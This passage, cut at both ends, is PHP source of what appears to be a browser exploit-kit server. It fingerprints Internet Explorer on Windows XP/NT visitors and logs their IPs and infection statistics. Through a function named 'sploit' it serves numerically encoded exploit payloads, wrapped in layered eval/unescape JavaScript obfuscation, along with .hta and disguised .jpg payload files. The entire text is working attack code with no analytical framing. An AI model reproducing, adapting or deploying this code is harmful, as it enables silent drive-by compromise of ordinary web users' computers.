parent.repl()" ; exit; } if ( isset ( $_GET['data'] ) and $_GET['pass'] == md5($Pass) ) { Save ( $FileLog, Array ("", "", 0 ) ); echo "" ; exit; } list ( $RealIP ) = explode ( ", ", $_SERVER["HTTP_X_FORWARDED_FOR"] ); define ( "ip", !isset($RealIP) ? $RealIP : $_SERVER["REMOTE_ADDR"] ); define ( "IP", sprintf( "%u", ip2long ( ip ) ) ); Function id () { $id = md5 ( uniqid ( rand() ) ); return substr ( $id, rand ( 0, 32 ), rand ( 0, 32 ) ); } Function Code ( $Code, $Url = "" ) { if ( $Url == "" ) { $Url = "eval(s)"; } else { $Url = "document.write ( s.replace( /%/, '$Url' ) )"; } $JScriptDeCode = str_replace ( ";", "; /" . "*" . id() . "*" . "/", " var s = '', qk = ''; for ( var i = 0; i < String(v).length; i += 3 ) { qk = parseInt( String( v ).slice( i, i + 3 ) ) >> 1; if ( qk > 200 ) { qk -= 200; } s += String.fromCharCode ( qk ); } $Url; " ); $Hex = $Code; for ( $i = 0; $i < strlen ( $JScriptDeCode ); $i++ ) { $Hex .= bin2hex( $JScriptDeCode { $i } ); } $JScriptCode = " var b = ''; var v = txt.slice ( 0, " . strlen ( $Code ) . " ); for ( i = " . strlen ( $Code ) . "; i < " . strlen ( $Hex ) . "; i += 2 ) { b += '%' + txt.slice ( i, i + 2 ); } eval ( unescape ( b ) ); "; $Hex = "/" . "*" . id() . "*". "/ var txt = '$Hex'; eval ( unescape ( '"; for ( $j = 0; $j < strlen ( $JScriptCode ); $j++ ) { $Hex .= "%". bin2hex ( $JScriptCode { $j } ); } $Hex .= "' ) ); "; $HTML = "eval(unescape('"; for ( $j=0; $j < strlen ( $Hex ); $j++ ) { $HTML .= "%" . bin2hex ( $Hex { $j } ); } return $HTML . "'));"; } Function Save ( $File, $Data ) { if ( $fs = @fopen ( $File, "a" ) ) { flock ( $fs, LOCK_EX ); ftruncate ( $fs, 0 ); fwrite ( $fs, @base64_encode ( @gzcompress ( @Serialize ( $Data ), 3 ) ) ); fflush ( $fs ); flock ( $fs, LOCK_UN ); fclose ( $fs ); } else { return -1; } } Function Open ( $File, $v = "") { $Data = ""; if ( $fs = @fopen ( $File, "r" ) ) { flock ( $fs, LOCK_SH ); while ( !feof( $fs ) ) { $Data .= fread ( $fs, 8192 ); } flock ( $fs, LOCK_UN ); fclose ( $fs ); if ( $v != "" ) { return $Data; } else { return @Unserialize ( @gzuncompress ( @base64_decode ( $Data ) ) ); } } else { return -1; } } Function Check ( $EXP, $IE = "", $SP = "", $q = "") { global $FileLog, $MaxLog; $Data = array(); $FileStat = array(); list( $Data, $DataStat, $Value ) = Open ($FileLog ); if ( $IE != "" ) { $Data[IP] = array ( "", array ( $IE, $SP, $q, date("H:i:s"), date("m.d.Y") ) ); if ( count ( $Data ) > $MaxLog ) { list ( $stat ) = array_slice ($Data, 0, 1); list ( $EXP_STAT , list ( $IE_STAT, $SP_STAT ) ) = $stat; $DataStat[0]++; if ( $IE_STAT == 6 and $SP_STAT == 2 ) { $DataStat[1]++; if ( $EXP_STAT != "" ) { $DataStat[2]++; } } elseif ( $IE_STAT == 6 and $SP_STAT == 1 ) { $DataStat[3]++; if ( $EXP_STAT != "" ) {$DataStat[4]++; } } else { $DataStat[5]++; if ( $EXP_STAT != "" ) {$DataStat[6]++;} } $DataTmp = $Data; $Data = array(); $j=0; foreach ($DataTmp as $ip => $info ) { if ($j!=0) { $Data[$ip]=$info; } $j=1; } } } else { if ( $Data[IP][0] == "" or $Data[IP][0] == $EXP ) { $Data[IP][0] = $EXP; } else { if ( $EXP == 4 ) { echo ""; } exit; } } Save ( $FileLog, Array ($Data, $DataStat, $Value ) ); } $Filter = array ( "/" => "", ".hta" => "" , ".jpg" => "" ); $N = strtr ( $_SERVER["PATH_INFO"], $Filter ); if ( is_numeric ( $N ) ) { Check ( $N ); if ( $N == 4 ) { $N = 1; } if ( $N == 1 ) { echo ""; } } else { $AGENT = $_SERVER["HTTP_USER_AGENT"]; if ( ( ereg("Windows NT", $AGENT) or ereg("Windows XP", $AGENT) ) and ereg("MSIE", $AGENT) and !ereg("Opera", $AGENT) ) { if ( !isset($_COOKIE["s"]) or isset($_GET['s2']) or isset($_GET['s1']) or isset($_GET['s'])) { if ($checkCookie == 1 ) { setcookie ("s", time(), time() + 2592000); } list ( $Data, $DataStat, $Value ) = Open( $FileLog ); $Value_Check = True; if ( $Value == 0 ) { $Value_Check = False; } elseif ( is_numeric ( $Value ) and $Value > 1 ) { if ( count ( $Data ) < $Value ) { $Value_Check = False; $Value--; Save ( $FileLog, Array ($Data, $DataStat, $Value ) ); } else { Save ( $FileLog, Array ($Data, $DataStat, 1) ); } } if ( $Value_Check ) { $DirPath = dirname($_SERVER["SCRIPT_NAME"]); define ( "DIR", "http://" . $_SERVER["HTTP_HOST"] . ( $DirPath == "\\" ? "" : $DirPath ) . "/" . basename ( $_SERVER["SCRIPT_NAME"] ) ."/" ); function sploit($n) { if ($n == 1) { echo Code ("520222596212202598232464230232242216202522468200210230224216594242516220222220202468464200594232594522468474468524520494222596212202598232524", basename($_SERVER["SCRIPT_NAME"])."?s1=1"); } if ($n == 2) { echo Code ("520222596212202598232464200594232594522468218230490210232230516218208232218216516204210216202516494494598516464598492218208232466474516516494216222206222492224208224468464232242224202522468232202240232494240490230598228210224232216202232468524520494222596212202598232524", DIR."2.jpg"); } if ($n == 3) { echo Code ("520530560560552538568464530564534544546572538522468474468464534558536538522468534222234220232202228468464574546536568544522468496468464544538546542544568522468496468524520494530560560552538568524", DIR."3.jpg"); } if ($n == 4) { echo Code ("520222596212202598232464210200522468240498468464598216594230230210200522468598216230210200516500536502508496500496498490540540540506490498498200498490512536496502490496496530496534514506514532534496530468464238210200232208522468498468464208202210206208232522468498468464594216210206220522468218210200200216202468524520224594228594218464220594218202522468530598232210236594232202530224224216202232230468464236594216234202522468498468524520224594228594218464220594218202522468530598232210236594232202530598232210236202576534222220232228222216230468464236594216234202522468498468524520494222596212202598232524520230598228210224232524204234220598232210222220464240496480482246240498492536558554492566598228210224232492222224202220480468474468488468590596216594220214468488468238210200232208522498488208202210206208232522498488216202204232522498496496496496468482518250230202232568210218202222234232480468240496480482468488502496496482518520494230598228210224232524", basename($_SERVER["SCRIPT_NAME"])."?s2=1"); } } if ( $_GET['s2']==1 ) { Check(4); echo ""; } elseif ( $_GET['s1']==1 ) { Check(1); header("Content-Type: application/hta"); echo Open ( DIR."1.hta", 1 ); } else { if ($_GET['s']==""){ echo ""; } else { $s = explode (",", $_GET['s']); $IE=$s[0];$SP=$s[1];$q=""; for($i=2;$i